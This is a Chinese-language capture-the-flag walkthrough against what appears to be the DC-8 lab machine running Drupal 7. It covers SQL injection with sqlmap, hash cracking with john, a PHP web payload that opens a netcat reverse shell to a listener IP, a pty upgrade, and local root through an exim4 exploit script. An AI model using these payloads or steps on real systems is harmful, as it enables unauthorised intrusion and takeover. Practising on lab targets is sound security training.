扫描出ip
Arp-scan -l
扫描端口
也是只有80和22号端口
访问网页
熟悉,不能再熟悉了
网页探测
变成了drupal7,这就和dc-1那个版本一样
那我们直接用dc-1的方法试一试
启动msfconsole
搜索Drupal的漏洞,然后一个一个尝试看是否可以利用。
一个一个的尝试
结果可想而知,全部失败
那就换一种思路
扫描目录
有一个/user登录界面
又回到网站去看看吧
发现一个框
抓包看看
我确实没看出什么,没什么利用点
那就又换吧
结果在这个地方发现了不对
当点击这三个,上面的url变了nid会变成1,2,3
我们尝试一下有没有注入点
报错
可以尝试sql注入
我们直接上sqlmap
数据库d7db
爆表
爆字段
爆数据
复制下来去解密一下
用john解密
john dc8.txt
然后爆破出turtle
我们尝试登录
Ssh登录失败,那应该是网页的登录
我们尝试一下
结果是john的密码
我们探索网站
这里可以写入东西
我们写入反弹shell
<?php system(“nc -e /bin/bash 172.16.16.130 5555”);?>
我们kali上先开启监听
有时候在这里输入一下才行
我们去kali上开启交互式shell
Python -c ‘import pty;pty.spawn(“/bin/bash”)’
查看系统命令
有很熟悉exim4
看看版本
我们去搜索一下版本漏洞
本地提权
下载下来看看
然后开启http服务
靶机去下载
然后运行
./469.sh -m netcat
成功